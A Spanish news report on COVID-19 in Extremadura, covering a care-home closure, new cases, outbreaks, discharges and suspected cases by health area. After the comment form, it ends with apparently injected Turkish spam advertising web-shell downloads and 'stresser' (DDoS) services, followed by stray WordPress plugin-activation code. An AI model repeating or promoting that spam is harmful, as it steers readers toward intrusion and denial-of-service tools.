Un positivo por covid-19 obliga a cerrar la residencia de mayores de Torre de Santa María


Un positivo por coronavirus ha obligado a cerrar la residencia de mayores del municipio cacereño de Torre de Santa María. Se trata de una mujer de 84 años que ha sido ingresada en el hospital San Pedro de Alcántara de Cáceres con pronóstico grave. Es el segundo caso de este tipo en dos días, ya que en la jornada de ayer un nuevo positivo detectado obligó a cerrar el centro de mayores ‘La Serena’ de Castuera. A este respecto, la consejería de Sanidad informa que en la jornada de este miércoles han concluido las pruebas PCR a residentes y trabajadores, un total de 160, y que los resultados se conocerán mañana.

Extremadura ha registrado en la última jornada un total de 21 nuevos casos, según el último informe de la Dirección General de Salud Pública, y el cierre de los brotes 3 y 5 en Badajoz. Actualmente hay diez brotes activos en la comunidad autónoma: en Casar de Cáceres, en Peraleda de la Mata, en Talavera la Real, en Torrecillas de la Tiesa, dos en Don Benito y el resto, cuatro, en Badajoz.

De los 21 nuevos casos notificados en estas últimas 24 horas, ocho se encuadran en el área sanitaria Badajoz. De ellos, tres son importados de Tarifa, Móstoles y Marbella; un positivo está asociado al brote diez; un caso tiene origen en una comunión en Aceuchal, un caso en Valdepasillas tiene origen desconocido, un positivo ha sido detectado en una clínica privada y otro caso procede de la zona de salud de Ciudad Jardín.

En Cáceres se han registrado siete nuevos positivos: cuatro procedentes del caso importado de Ecuador que se notificó ayer, una agrupación familiar; un positivo asociado al brote de Navas del Madroño y un prequirúrgico, además del caso en la residencia de ancianos de Torre de Santa María.

El área de salud de Navalmoral de la Mata ha registrado cinco nuevos casos, dos importados de Cádiz y tres de un brote notificado en Valladolid. El área de salud de Don Benito-Villanueva de la Serena ha detectado un caso positivo, importado de Madrid.

Además, se han dado once nuevas altas, lo que eleva a 4.612 la cifra de pacientes curados. Hay once pacientes hospitalizados: cuatro en Badajoz, cuatro en Don Benito Villanueva, dos en Navalmoral de la Mata y uno en el área de Cáceres, la mujer que ha dado positivo en la residencia de Torre de Santa María. De ellos, cuatro de ellos están UCI (tres en el área de Badajoz y uno en Don Benito-Villanueva).

Altas por áreas de saludBadajoz.
676 altas (ocho más que ayer)
Cáceres.
1.966 altas.
Mérida.
419 altas (una más que ayer).
Plasencia.
603 altas.
Don Benito-Villanueva de la Serena.
349 altas.
Navalmoral de la Mata.
345 altas (una más que ayer).
Coria
196 altas.
Llerena-Zafra.
58 altas (una más que ayer).

Casos sospechosos

Se han detectado 182 casos sospechosos y se han descartado 192 de los acumulados. Por áras, en Badajoz se han detectado 48 posibles nuevos casos y se han descartado 36; en Cáceres se han registrado 37 casos sospechosos y se han descartado 40; en Mérida se han notificado 13 posibles nuevos casos y se han descartado 16; y en Plasencia se han detectado 16 casos sospechosos y se han descartado 28.

Por su parte, en Don Benito-Villanueva se han registrado 45 casos sospechosos y se han descartado 47; en Navalmoral se han notificado 6 casos sospechosos y se han descartado 5; en Coria se han detectado 6 nuevos posibles casos y se han descartado 6; y en Llerena-Zafra, 11 casos sospechosos y se han descartado 14.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Shell İndir Oyun Hileleri stresser

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );